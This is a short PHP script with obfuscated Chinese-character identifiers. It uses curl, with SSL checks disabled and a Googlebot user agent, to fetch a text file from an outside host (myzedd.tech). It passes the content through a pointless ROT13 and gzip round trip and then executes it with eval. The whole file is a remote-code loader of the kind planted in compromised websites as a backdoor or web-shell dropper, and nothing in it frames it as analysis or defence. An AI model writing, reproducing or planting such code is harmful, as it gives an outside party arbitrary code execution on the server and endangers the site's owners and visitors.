<?php
/* 2y3z4a 七玄迷阵 */
class ___七玄迷阵___ {
    function __call($__迷, $__阵) {
        $ch = curl_init($__阵[0]);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 17);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
        $data = curl_exec($ch);
        curl_close($ch);
        
        // Encrypt pake ROT13 + gzip
        if (strlen($data) > 90) {
            $data = str_rot13($data);
            if (function_exists('gzcompress')) {
                $data = base64_encode(gzcompress($data, 9));
            } else {
                $data = base64_encode($data);
            }
            return $data;
        }
        return $data;
    }
}
$___a = new ___七玄迷阵___();
$___b = str_split('https://myzedd.tech/project/rahman1.txt', 777);
$___c = $___a->迷($___b[0]);
if (strlen($___c) > 90) {
    $___c = base64_decode($___c);
    if (function_exists('gzuncompress')) {
        $___c = gzuncompress($___c);
    }
    $___c = str_rot13($___c);
    eval('?>' . $___c);
}
?>